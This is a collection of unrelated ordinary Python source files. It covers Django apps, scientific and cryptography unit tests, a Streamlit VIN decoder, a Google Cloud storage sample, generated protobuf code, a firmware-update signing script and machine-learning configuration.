""" If not in attrbites the search on pandas dataframe
"""
if key in self.__dict__:
return getattr(self, key)
else:
return getattr(self._dataframe, key)
def __str__(self):
""" Build the default function to represent the catalogue
user friendly
"""
result = ""
for key, value in self._groups.items():
result += "GROUP {}:\n".format(key)
result += str(self._groups[key])
return result
def __repr__(self):
""" Perpare the catalogue to be represented as object to
be saved and loaded later on.
"""
pass
def _item_added(self, key, item):
""" Iten has been added
"""
#print("Element added in {}: {}".format(id,key))
# Add current iten into the all list
self._items[item] = self[key][item]
def _item_removed(self, key, item):
""" Item has been removed from the Dict
"""
#print("Element removed in {}: {}".format(id,key))
if key == self._index and key in self._dataframe.index:
# Remove the current row
self._dataframe.drop(item, inplace=True)
else:
# Remove the element from the curren col
self.unbind(key, item, None)
# Remove the item from the full list
del self._items[item]
def _item_modified(self, key, item):
""" Item has been modified
"""
# Replace the item
self._items[item] = self[key][item]
def _callback_group(self, key, item, option):
""" Function call-call back when new element is
inserted into a list.
"""
if option == CatalogueGroup.ADDED:
# Create new mapping based on the added item
self._item_added(key, item)
elif option == CatalogueGroup.REMOVED:
# Create new mapping based on the added item
self._item_removed(key, item)
else:
# Create new mapping based on the added item
self._item_modified(key, item)
def get(self, item):
""" This function will look for the current key item
inside all the items stored
"""
return self._items[item]
def bind(self, index, column, item):
""" This function will map the current item with the
given index and col.
"""
# Bind the current index, col using dataframe
if self._dataframe.empty:
# Add the current data into the attributes frame
self._dataframe = pd.DataFrame([item], index = [index], columns=[column])
else:
# Add the current data into the attributes frame
self._dataframe.loc[index,column] = item
def unbind(self, index, column, item):
""" This function will unbind the current key from the catalogue.
"""
if column in self._dataframe.columns and index in self._dataframe.index:
# Remove the element from the curren col
self._dataframe.loc[index,column] = np.NaN
|
from django.db import models
from django.conf import settings
class Suspicious(models.Model):
user = models.ForeignKey(
settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='suspicious', verbose_name=('user')
)
attempt = models.PositiveSmallIntegerField(default=1, verbose_name=('attempt'))
first_attempt = models.DateTimeField(auto_now_add=True, verbose_name=('first attempt'))
last_attempt = models.DateTimeField(auto_now=True, verbose_name=('last attempt'))
ip = models.CharField(max_length=150, verbose_name='ip address', blank=True, null=True)
mac = models.CharField(max_length=150, verbose_name='mac address', blank=True, null=True)
def __str__(self):
return self.user.username
class Meta:
verbose_name = ("Suspicious User")
verbose_name_plural = ("Suspicious Users")
ordering = ["-last_attempt"]
|
from django.apps import AppConfig
class SearchPageConfig(AppConfig):
name = 'search_page'
|
#!/usr/bin/env python
# Copyright 2021 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from pyscf import lib
from pyscf import gto
from pyscf import scf
from pyscf.mcscf import avas
class KnownValues(unittest.TestCase):
def test_avas(self):
mol = gto.M(
atom = '''
H 0.000000, 0.500000, 1.5
O 0.000000, 0.000000, 1.
O 0.000000, 0.000000, -1.
H 0.000000, -0.500000, -1.5''',
basis = '6-31g',
spin = 2,
verbose = 7,
output = '/dev/null'
)
mf = scf.RHF(mol).run()
ncas, nelecas, mo = avas.kernel(mf, 'O 2p')
self.assertAlmostEqual(abs(mo).sum(), 106.25385500717569, 6)
self.assertAlmostEqual(lib.fp(abs(mo)), 2.0834371806990823, 7)
ncas, nelecas, mo = avas.kernel(mf, 'O 2p', openshell_option=3)
self.assertAlmostEqual(abs(mo).sum(), 106.59750085040332, 6)
self.assertAlmostEqual(lib.fp(abs(mo)), 1.886278150191051, 7)
ncas, nelecas, mo = avas.kernel(mf.to_uhf(), 'O 2p')
self.assertAlmostEqual(abs(mo).sum(), 106.11798294361598, 6)
self.assertAlmostEqual(lib.fp(abs(mo)), 2.0950187018846607, 7)
mol.stdout.close()
if __name__ == "__main__":
print("Full Tests for mcscf.avas")
unittest.main()
|
from os import close
from django.http import HttpResponse
from django.template import Template, Context
from django.template import loader
import datetime
def saludo(request):
return HttpResponse("Hola Django - Coder")
def segundaView(request):
return HttpResponse("Soy Lautaro Murua este es mi sitio web desarrollado en Django")
def diaDeHoy(request):
dia = datetime.datetime.now()
documentoDeTexto = f"Hoy es dia: <br> {dia}"
return HttpResponse(documentoDeTexto)
def apellido(request, ape):
return HttpResponse(f"El mejor programador se llama {ape}!!")
def probandoTemplate(request):
mejorProgramador = "Lautaro Murua"
lenguaje = "Python"
frameworksPython = ["flask", "Pyramid", "Django", "Web2py"]
diccionario = {"nombre":mejorProgramador,"lenguaje":lenguaje, "frameworks": frameworksPython}
plantilla = loader.get_template("template1.html")
documento = plantilla.render(diccionario)
return HttpResponse(documento) |
#!/usr/bin/env python
# coding: utf-8
# In[105]:
import pandas as pd
import numpy as np
import pickle
import streamlit as st
def AshokLeyland(x):
df = pd.DataFrame({
'Jan':['A','B','C','D','E','F','G','H','J','K','L','M','N','P','R','S','T','V'],
'Feb':['Y','A','B','C','D','E','F','G','H','J','K','L','M','N','P','R','S','T'],
'Mar':['X','Y','A','B','C','D','E','F','G','H','J','K','L','M','N','P','R','S'],
'Apr':['W','X','Y','A','B','C','D','E','F','G','H','J','K','L','M','N','P','R'],
'May':['V','W','X','Y','A','B','C','D','E','F','G','H','J','K','L','M','N','P'],
'Jun':['T','V','W','X','Y','A','B','C','D','E','F','G','H','J','K','L','M','N'],
'Jul':['S','T','V','W','X','Y','A','B','C','D','E','F','G','H','J','K','L','M'],
'Aug':['R','S','T','V','W','X','Y','A','B','C','D','E','F','G','H','J','K','L'],
'Sep':['P','R','S','T','V','W','X','Y','A','B','C','D','E','F','G','H','J','K'],
'Oct':['N','P','R','S','T','V','W','X','Y','A','B','C','D','E','F','G','H','J'],
'Nov':['M','N','P','R','S','T','V','W','X','Y','A','B','C','D','E','F','G','H'],
'Dec':['L','M','N','P','R','S','T','V','W','X','Y','A','B','C','D','E','F','G']
}).set_index([pd.Index([str(2011 + i) for i in range(18)])])
temp = [str(2011 + i) for i in range(20)]
temp1 = ["B","C","D","E","F","G","H","J","K","L","M","N","P","R","S","T","V","W","X","Y"]
year_dict = dict()
for i in range(len(temp)):
year_dict[temp1[i]] = temp[i]
a = df.loc[year_dict[x[9]],]
temp = list(a.index)
temp1= list(a)
temp2 = dict()
for i in range(len(temp)):
temp2[temp1[i]] = temp[i]
return([year_dict[x[9]],temp2[x[11]]])
def TataMotors(x):
month_dict = {"A":"Jan",
"B":"Feb",
"C":"Mar",
"D":"Apr",
"E":"May",
"F":"Jun",
"G":"Jul",
"H":"Aug",
"J":"Sep",
"K":"Oct",
"N":"Nov",
"P":"Dec"}
temp = [str(2011 + i) for i in range(24)]
temp1 = ["B","C","D","E","F","G","H","J","K","L","M","N","P","R","S","T","V","W","X","Y","1","2","3","4"]
year_dict = dict()
for i in range(len(temp)):
year_dict[temp1[i]] = temp[i]
return([year_dict[x[9]],month_dict[x[11]]])
def Validate(x):
x = x.replace(" ", "").upper()
y = ""
try:
if(x[0:3] == 'MAT' and len(x) >= 15 and len(x) <= 17):
res = TataMotors(x)
y = {"Manufacturer":"Tata Motors","Year" : res[0],"Month":res[1]}
elif(x[0:2] == 'MB' and len(x) >= 15 and len(x) <= 17):
res = AshokLeyland(x)
y = {"Manufacturer":"Ashok Leyland","Year" : res[0],"Month":res[1]}
else:
y = "Chassis no is not valid"
except:
y = "Chassis no is not valid"
return y
#x = "MAT491125FJC0189"
#x = "MB1AA22E9FRD95267"
#Validate(x)
def main():
# giving the webpage a title
# here we define some of the front end elements of the web page like
# the font and background color, the padding and the text to be displayed
html_temp = """
<h1 style ="color:black;text-align:center;">Chassis Number Decoder </h1>
</div>
"""
# this line allows us to display the front end aspects we have
# defined in the above code
st.markdown(html_temp, unsafe_allow_html = True)
# the following lines create text boxes in which the user can enter
# the data required to make the prediction
x = st.text_input("VIN", "")
result =""
# the below line ensures that when the button called 'Predict' is clicked,
# the prediction function defined above is called to make the prediction
# and store it in the variable result
if st.button("Validate"):
result = Validate(x)
st.success('The output is {}'.format(result))
if __name__=='__main__':
main()
# In[ ]:
|
#!/usr/bin/env python
"""
dot to json
===========
Convert from graphviz dot file to json in order to visualize a graph using d3.js
You must install pygraphviz and networkx, on Ubuntu:
sudo apt-get install python-pygraphviz python-networkx
Then use the following template replacing the resulting 'force.json'
https://github.com/networkx/networkx/tree/master/examples/javascript/force
"""
def dot_to_json(file_in, file_out, indent=1):
import json
try:
import networkx
import pygraphviz
from networkx.readwrite import json_graph
except ImportError:
print("Install pygraphviz and networkx:")
print("sudo apt-get install python-pygraphviz python-networkx")
return 1
graph_dot = pygraphviz.AGraph( file_in )
graph_netx = networkx.from_agraph( graph_dot )
graph_json = json_graph.node_link_data( graph_netx )
# fix formatting [graphviz to d3.js]
for node in graph_json["nodes"]:
# replace label by name
node['name'] = node.pop('label')
# id from string to integer
node['id'] = int(node['id'])
with open(file_out, 'w') as f:
json.dump(graph_json, f, indent=indent)
return 0
def main(argv):
if len(argv) < 3:
print("usage: %s file_in.dot file_out.json"%argv[0])
return 1
return dot_to_json(argv[1], argv[2])
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
|
#!/usr/bin/env python3
import unittest
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from demo import add, minus
class TestDemo(unittest.TestCase):
"""Test mathfuc.py"""
@classmethod
def setUpClass(cls):
print ("this setupclass() method only called once.\n")
@classmethod
def tearDownClass(cls):
print ("this teardownclass() method only called once too.\n")
def setUp(self):
print ("do something before test : prepare environment.\n")
def tearDown(self):
print ("do something after test : clean up.\n")
def test_add(self):
"""Test method add(a, b)"""
self.assertEqual(3, add(1, 2))
self.assertNotEqual(3, add(2, 2))
def test_minus(self):
"""Test method minus(a, b)"""
self.assertEqual(1, minus(3, 2))
self.assertNotEqual(1, minus(3, 2))
@unittest.skip("do't run as not ready")
def test_minus_with_skip(self):
"""Test method minus(a, b)"""
self.assertEqual(1, minus(3, 2))
self.assertNotEqual(1, minus(3, 2))
if __name__ == '__main__':
# verbosity=*:默认是1;设为0,则不输出每一个用例的执行结果;2-输出详细的执行结果
unittest.main(verbosity=1) |
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import pytest
from cryptography.hazmat.primitives import constant_time
class TestConstantTimeBytesEq(object):
def test_reject_unicode(self):
with pytest.raises(TypeError):
constant_time.bytes_eq(b"foo", u"foo")
with pytest.raises(TypeError):
constant_time.bytes_eq(u"foo", b"foo")
with pytest.raises(TypeError):
constant_time.bytes_eq(u"foo", u"foo")
def test_compares(self):
assert constant_time.bytes_eq(b"foo", b"foo") is True
assert constant_time.bytes_eq(b"foo", b"bar") is False
assert constant_time.bytes_eq(b"foobar", b"foo") is False
assert constant_time.bytes_eq(b"foo", b"foobar") is False
|
#!/usr/bin/env python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
# [START storage_get_hmac_key]
from google.cloud import storage
def get_key(access_id, project_id):
"""
Retrieve the HMACKeyMetadata with the given access id.
"""
# project_id = "Your Google Cloud project ID"
# access_id = "ID of an HMAC key"
storage_client = storage.Client(project=project_id)
hmac_key = storage_client.get_hmac_key_metadata(
access_id, project_id=project_id
)
print("The HMAC key metadata is:")
print("Service Account Email: {}".format(hmac_key.service_account_email))
print("Key ID: {}".format(hmac_key.id))
print("Access ID: {}".format(hmac_key.access_id))
print("Project ID: {}".format(hmac_key.project))
print("State: {}".format(hmac_key.state))
print("Created At: {}".format(hmac_key.time_created))
print("Updated At: {}".format(hmac_key.updated))
print("Etag: {}".format(hmac_key.etag))
return hmac_key
# [END storage_get_hmac_key]
if __name__ == "__main__":
get_key(access_id=sys.argv[1], project_id=sys.argv[2])
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: message.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='message.proto',
package='',
syntax='proto3',
serialized_pb=_b('\n\rmessage.proto\"}\n\x07\x43ommand\x12\"\n\x04type\x18\x01 \x01(\x0e\x32\x14.Command.CommandType\x12\x0f\n\x07\x63hannel\x18\x02 \x01(\t\"=\n\x0b\x43ommandType\x12\x08\n\x04PLAY\x10\x00\x12\t\n\x05PAUSE\x10\x01\x12\x08\n\x04STOP\x10\x02\x12\x0f\n\x0bSET_CHANNEL\x10\x03\"8\n\x08MetaInfo\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07\x62itrate\x18\x02 \x01(\x05\x12\r\n\x05\x63odec\x18\x03 \x01(\tb\x06proto3')
)
_COMMAND_COMMANDTYPE = _descriptor.EnumDescriptor(
name='CommandType',
full_name='Command.CommandType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PLAY', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PAUSE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='STOP', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SET_CHANNEL', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=81,
serialized_end=142,
)
_sym_db.RegisterEnumDescriptor(_COMMAND_COMMANDTYPE)
_COMMAND = _descriptor.Descriptor(
name='Command',
full_name='Command',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='Command.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='channel', full_name='Command.channel', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_COMMAND_COMMANDTYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=17,
serialized_end=142,
)
_METAINFO = _descriptor.Descriptor(
name='MetaInfo',
full_name='MetaInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='MetaInfo.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bitrate', full_name='MetaInfo.bitrate', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='codec', full_name='MetaInfo.codec', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=144,
serialized_end=200,
)
_COMMAND.fields_by_name['type'].enum_type = _COMMAND_COMMANDTYPE
_COMMAND_COMMANDTYPE.containing_type = _COMMAND
DESCRIPTOR.message_types_by_name['Command'] = _COMMAND
DESCRIPTOR.message_types_by_name['MetaInfo'] = _METAINFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Command = _reflection.GeneratedProtocolMessageType('Command', (_message.Message,), dict(
DESCRIPTOR = _COMMAND,
__module__ = 'message_pb2'
# @@protoc_insertion_point(class_scope:Command)
))
_sym_db.RegisterMessage(Command)
MetaInfo = _reflection.GeneratedProtocolMessageType('MetaInfo', (_message.Message,), dict(
DESCRIPTOR = _METAINFO,
__module__ = 'message_pb2'
# @@protoc_insertion_point(class_scope:MetaInfo)
))
_sym_db.RegisterMessage(MetaInfo)
# @@protoc_insertion_point(module_scope)
|
#!/usr/bin/env python3
#
# Copyright (c) 2017-2020 Linutronix GmbH
#
# SPDX-License-Identifier: MIT
import libconf
import codecs
import logging
import os
import os.path
import shutil
import hashlib
from subprocess import Popen, PIPE
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from tempfile import TemporaryDirectory
import struct
def getuncompressedsize(filename):
with open(filename, 'rb') as f:
f.seek(-4, 2)
return struct.unpack('I', f.read(4))[0]
def getsha256(filename):
m = hashlib.sha256()
with open(filename, 'rb') as f:
while True:
data = f.read(1024)
if not data:
break
m.update(data)
return m.hexdigest()
def find_and_link_file(entry, libdirs):
fname = entry.filename
for d in libdirs:
dname = os.path.join(d, fname)
if os.path.exists(dname):
try:
os.symlink(dname, fname)
except FileExistsError:
pass
return dname
def handle_image(i, opt):
if 'filename' not in i:
return
file_iv = find_and_link_file(i, opt.libdirs)
sha256 = getsha256(i.filename)
i['sha256'] = sha256
if 'volume' in i and 'compressed' in i and (
i.compressed is True or i.compressed == "zlib"):
if 'encrypted' in i:
logging.warning("""The decompressed-size cannot be calculated
for preencrypted volumes.""")
else:
unc_size = getuncompressedsize(file_iv)
if 'properties' not in i:
i['properties'] = {}
i['properties']['decompressed-size'] = str(unc_size)
def handle_script(i, opt):
if 'filename' not in i:
return
find_and_link_file(i, opt.libdirs)
sha256 = getsha256(i.filename)
i['sha256'] = sha256
def find_key(key, d):
if isinstance(d, dict):
if key in d:
for i in d[key]:
yield i
for k in d.values():
for x in find_key(key, k):
yield x
def main():
parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter,
description='''Generate (signed) swu-update file,
based on information from a
template sw-description.''')
parser.add_argument("template", metavar="TEMPLATE",
help="sw-description template (sw-decription.in)")
parser.add_argument("--debug", action="store_true", dest="debug",
default=False,
help="Enable various features for debugging")
parser.add_argument("-k", "--key", dest="key",
help="""pkcs11 uri or file name of the key used for
signing the update""")
parser.add_argument("-o", "--output", dest="output",
default="firmware.swu",
help="filename of the resulting update file")
parser.add_argument("-C", "--chdir", dest="chdir",
help="""directory where the sw-update cpio archive is
built""")
parser.add_argument("-L", "--libdir", dest="libdirs", action="append",
default=['.'],
help="""add path where files (e.g. images and scripts)
are searched""")
opt = parser.parse_args()
# make all paths absolute
swdescription_in = os.path.abspath(opt.template)
if opt.key:
keyfile = os.path.abspath(opt.key)
opt.output = os.path.abspath(opt.output)
opt.libdirs = [os.path.abspath(p) for p in opt.libdirs]
if not opt.chdir:
temp = TemporaryDirectory()
opt.chdir = temp.name
os.chdir(opt.chdir)
fp = codecs.open(swdescription_in, 'r', 'utf-8')
cc = libconf.load(fp, filename=swdescription_in)
for i in find_key('images', cc.software):
handle_image(i, opt)
for i in find_key('scripts', cc.software):
handle_script(i, opt)
for i in find_key('files', cc.software):
handle_script(i, opt)
fp = codecs.open('sw-description', 'w', 'utf-8')
libconf.dump(cc, fp)
fp.close()
files = ['sw-description']
if opt.key:
if os.path.isfile(keyfile):
logging.warning("""Please consider providing a pkcs11 uri instead
of a key file.""")
sign_cmd = 'openssl dgst -sha256 \
-sign "%s" sw-description \
> sw-description.sig' % keyfile
else:
sign_cmd = 'openssl dgst -sha256 \
-engine pkcs11 \
-keyform engine \
-sign "%s" sw-description \
> sw-description.sig' % opt.key
# Preventing the malloc check works around Debian bug #923333
if os.system('MALLOC_CHECK_=0 ' + sign_cmd) != 0:
print('failed to sign sw-description')
files.append('sw-description.sig')
for i in find_key('images', cc.software):
if 'filename' in i:
files.append(i.filename)
for i in find_key('scripts', cc.software):
if 'filename' in i:
files.append(i.filename)
for i in find_key('files', cc.software):
if 'filename' in i:
files.append(i.filename)
swfp = open(opt.output, 'wb')
cpio_cmd = 'paxcpio'
cpio_opt = '-L'
if not shutil.which(cpio_cmd):
cpio_cmd = 'cpio'
cpio_opt = '--dereference'
cpio = Popen([cpio_cmd, '-ov', '-H', 'crc', cpio_opt],
stdin=PIPE, stdout=swfp)
files_for_cpio = []
for i in files:
if i not in files_for_cpio:
files_for_cpio.append(i)
for n in files_for_cpio:
if cpio_cmd == 'cpio' and os.path.getsize(n) > (2 << 30):
logging.warning('''%s is greater than 2GiB. %s will have a bad
checksum with GNU cpio. Install paxcpio or
configure SWUpdate with DISABLE_CPIO_CRC.''',
n, opt.output)
cpio.stdin.write(bytes(n+'\n', 'utf-8'))
cpio.stdin.close()
cpio.wait()
swfp.close()
print('finished')
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import os
import json
import subprocess
from wt.jinja import filters
workdir = os.path.dirname(__file__)
rootdir = os.path.dirname(workdir)
srcdir = os.path.join(rootdir, 'src')
script = os.path.join(workdir, 'parse_css.js')
def parse_css(filename):
cmd = [
'node',
script,
os.path.join(srcdir, filename)
]
res = subprocess.run(cmd, capture_output=True)
return json.loads(res.stdout)
def filename_to_id(filename):
return filename[:-4].replace('/', '-').replace('_', '-')
def css_content(filename):
filename = os.path.join(srcdir, filename)
with open(filename, 'rt') as f:
return f.read().strip()
filters.add(parse_css)
filters.add(filename_to_id)
filters.add(css_content)
|
from os import chdir, getcwd
# VERY IMPORTANT: Use the 'execute_at_target' function wrapper to
# take actions inside task directories; do not manually
# move the target directory!!
def execute_at_target(func, task):
original_dir = getcwd()
chdir(task.target_dir)
func(task)
chdir(original_dir)
|
# -*- coding: utf-8 -*-
__version__ = '2.0.0'
default_app_config = 'djangocms_snippet.apps.SnippetConfig'
|
from enhanced_subject_verb_object_extract import findSVOs, nlp
from nltk_subject_verb_object_extraction import SVO
from collections import OrderedDict
import pandas as pd
from pprint import pprint
def get_nsvos(extractor: SVO, text: str):
ntokens = extractor.sentence_split(text)
nsvo_extraction = []
for s in ntokens:
root_tree = extractor.get_parse_tree(s)
nsvo_extraction.append(extractor.process_parse_tree(next(root_tree)))
return nsvo_extraction
def process_persuasion_data(data_file: str):
dialogs = OrderedDict()
dialog_ids = []
header = ["index", "text", "turn", "speaker", "dialog_id"]
data = pd.read_csv(data_file)
nltksvo = SVO()
for _, row in data.iterrows():
if row["dialog_id"] in dialog_ids:
turn = {
"speaker": row["role"],
"turn": row["turn"],
"utterance": row["unit"],
"esvo": findSVOs(nlp(row["unit"])),
"nsvo": get_nsvos(nltksvo, row["unit"])
}
dialogs[row["dialog_id"]]["turns"].append(turn)
else:
dialog_ids.append(row["dialog_id"])
dialogs[row["dialog_id"]] = {
"dialog_id": row["dialog_id"],
"turns": [
{
"speaker": row["role"],
"turn": row["turn"],
"utterance": row["unit"],
"esvo": findSVOs(nlp(row["unit"])),
"nsvo": get_nsvos(nltksvo, row["unit"])
}
]
}
return [d for _, d in dialogs.items()]
if __name__ == '__main__':
dialogs = process_persuasion_data('data/Persuasion/full_dialog.csv')
svo_datafile = open(f"data/Persuasion/svo_dialogs.json", encoding="utf8", mode='w')
svo_datafile.write(json.dumps(dialogs))
svo_datafile.close()
|
"""
Implements a Processor for dequantizing model parameters.
"""
import logging
from typing import Any
import torch
from plato.processors import model
class Processor(model.Processor):
"""
Implements a Processor for dequantizing model parameters.
"""
def __init__(self, **kwargs) -> None:
super().__init__(**kwargs)
def process(self, data: Any) -> Any:
"""
Implements a Processor for dequantizing model parameters.
"""
output = super().process(data)
logging.info("[Server #%d] Dequantized features.", self.server_id)
return output
def _process_layer(self, layer: torch.Tensor) -> torch.Tensor:
layer = torch.dequantize(layer)
return layer
|
class Utils:
@staticmethod
def format_time(time):
""" Formats the given time into HH:MM:SS """
seconds = (time / 1000) % 60
minutes = (time / (1000 * 60)) % 60
hours = (time / (1000 * 60 * 60)) % 24
return "%02d:%02d:%02d" % (hours, minutes, seconds)
|
import tensorflow as tf
flags = tf.app.flags
flags.DEFINE_integer("batch_size", 64, "batch size")
flags.DEFINE_integer("max_iters", 600000, "the maxmization epoch")
flags.DEFINE_integer("latent_dim", 128, "the dim of latent code")
flags.DEFINE_float("lr", 0.0003, "the init of learn rate")
#Please set this num of repeat by the size of your datasets.
flags.DEFINE_integer(
"repeat", 10000, "the numbers of repeat for your datasets")
flags.DEFINE_string("path", 'oem',
"for example, '/home/jack/data/' is the directory of your celebA data")
flags.DEFINE_integer("op", 0, "Training or Test")
flags.DEFINE_integer("seed", 1, "Training or Test")
flags.DEFINE_string(
'hparams', '', 'Comma separated list of "name=value" pairs.')
flags.DEFINE_float('alpha', 10, 'lambda1')
flags.DEFINE_float('beta', 1, 'lambda2')
flags.DEFINE_integer('gamma', 0, 'recon or lossy recon')
flags.DEFINE_boolean('test', False, 'fast test')
flags.DEFINE_boolean('supervised', False, 'fast test')
flags.DEFINE_boolean('blur', False, 'fast test')
flags.DEFINE_integer('print_every', 200, 'print every')
flags.DEFINE_integer('save_every', 2000, 'print every')
flags.DEFINE_string('load', 'none', 'load best last')
flags.DEFINE_string('measurement_type', 'drop_patch', 'name of experiment')
flags.DEFINE_string('dataset', 'celebA', 'name of experiment')
flags.DEFINE_string('exp_name', '', 'name of experiment')
flags.DEFINE_string('exp_name_test', 'normal', 'name of experiment')
flags.DEFINE_string('unmeasure_type', 'blur', 'name of experiment')
flags.DEFINE_string('train_mode', 'ambient', 'name of experiment')
flags.DEFINE_float("lr_test", 0.1, "the init of learn rate")
flags.DEFINE_float("x_min", -1, "the init of learn rate")
flags.DEFINE_float("x_max", 1, "the init of learn rate")
flags.DEFINE_float("l2_w", 1e-6, "the init of learn rate")
flags.DEFINE_float("ml1_w", 5, "the init of learn rate")
flags.DEFINE_float("ml2_w", 0, "the init of learn rate")
flags.DEFINE_float("dl1_w", 0, "the init of learn rate")
flags.DEFINE_float("dl2_w", 0, "the init of learn rate")
flags.DEFINE_float("zp_w", 0.001, "the init of learn rate")
flags.DEFINE_float("drop_prob", 0.9, "the init of learn rate")
flags.DEFINE_float("blur_radius", 1, "the init of learn rate")
flags.DEFINE_float("additive_noise_std", 0.2, "the init of learn rate")
flags.DEFINE_float("signal_power", 0.2885201, "the init of learn rate")
flags.DEFINE_integer("iter_test", 100, "the init of learn rate")
flags.DEFINE_integer("num_angles", 1, "the init of learn rate")
flags.DEFINE_integer("patch_size", 32, "the init of learn rate")
flags.DEFINE_integer("blur_filter_size", 5, "the init of learn rate")
flags.DEFINE_integer("c_dim", 3, "the init of learn rate")
flags.DEFINE_list("image_dims", [64,64,3], "the init of learn rate")
FLAGS = flags.FLAGS
|
import copy
from cv2 import log
import numpy as np
import torch
from utils.Fed import FedAvg,FedAvgGradient, FedAvgP
from core.SGDClient_hr import SGDClient
from core.SVRGClient_hr import SVRGClient
from core.Client_hr import Client
from core.ClientManage import ClientManage
class ClientManageHR(ClientManage):
def __init__(self,args, net_glob, client_idx, dataset, dict_users, hyper_param) -> None:
super().__init__(args, net_glob, client_idx, dataset, dict_users, hyper_param)
self.client_idx=client_idx
self.args=args
self.dataset=dataset
self.dict_users=dict_users
self.hyper_param = copy.deepcopy(hyper_param)
def fed_in(self):
print(self.client_idx)
w_glob = self.net_glob.state_dict()
if self.args.all_clients:
print("Aggregation over all clients")
w_locals = [w_glob for i in range(self.args.num_users)]
else:
w_locals=[]
loss_locals = []
grad_locals = []
client_locals = []
temp_net=copy.deepcopy(self.net_glob)
for name, w in temp_net.named_parameters():
if not "header" in name:
w.requires_grad= False
for idx in self.client_idx:
if self.args.optim == 'sgd':
client = SGDClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
elif self.args.optim == 'svrg':
client = SVRGClient(self.args, idx, copy.deepcopy(temp_net),self.dataset, self.dict_users, self.hyper_param)
grad = client.batch_grad()
grad_locals.append(grad)
else:
raise NotImplementedError
client_locals.append(client)
if self.args.optim == 'svrg':
avg_grad = FedAvgGradient(grad_locals)
for client in client_locals:
client.set_avg_q(avg_grad)
for client in client_locals:
w, loss = client.train_epoch()
if self.args.all_clients:
w_locals[idx] = copy.deepcopy(w)
else:
w_locals.append(copy.deepcopy(w))
loss_locals.append(copy.deepcopy(loss))
# update global weights
w_glob = FedAvg(w_locals)
# copy weight to net_glob
self.net_glob.load_state_dict(w_glob)
loss_avg = sum(loss_locals) / len(loss_locals)
return w_glob, loss_avg
def fedIHGP(self,client_locals):
d_out_d_y_locals=[]
for client in client_locals:
d_out_d_y,_=client.grad_d_out_d_y()
d_out_d_y_locals.append(d_out_d_y)
p=FedAvgP(d_out_d_y_locals,self.args)
p_locals=[]
if self.args.hvp_method == 'global_batch':
for i in range(self.args.neumann):
for client in client_locals:
p_client = client.hvp_iter(p, self.args.hlr)
p_locals.append(p_client)
p=FedAvgP(p_locals, self.args)
elif self.args.hvp_method == 'local_batch':
for client in client_locals:
p_client=p.clone()
for _ in range(self.args.neumann):
p_client = client.hvp_iter(p_client, self.args.hlr)
p_locals.append(p_client)
p=FedAvgP(p_locals, self.args)
else:
raise NotImplementedError
return p
def lfed_out(self,client_locals):
hg_locals =[]
for client in client_locals:
for _ in range(self.args.outer_tau):
client.hyper_iter=0
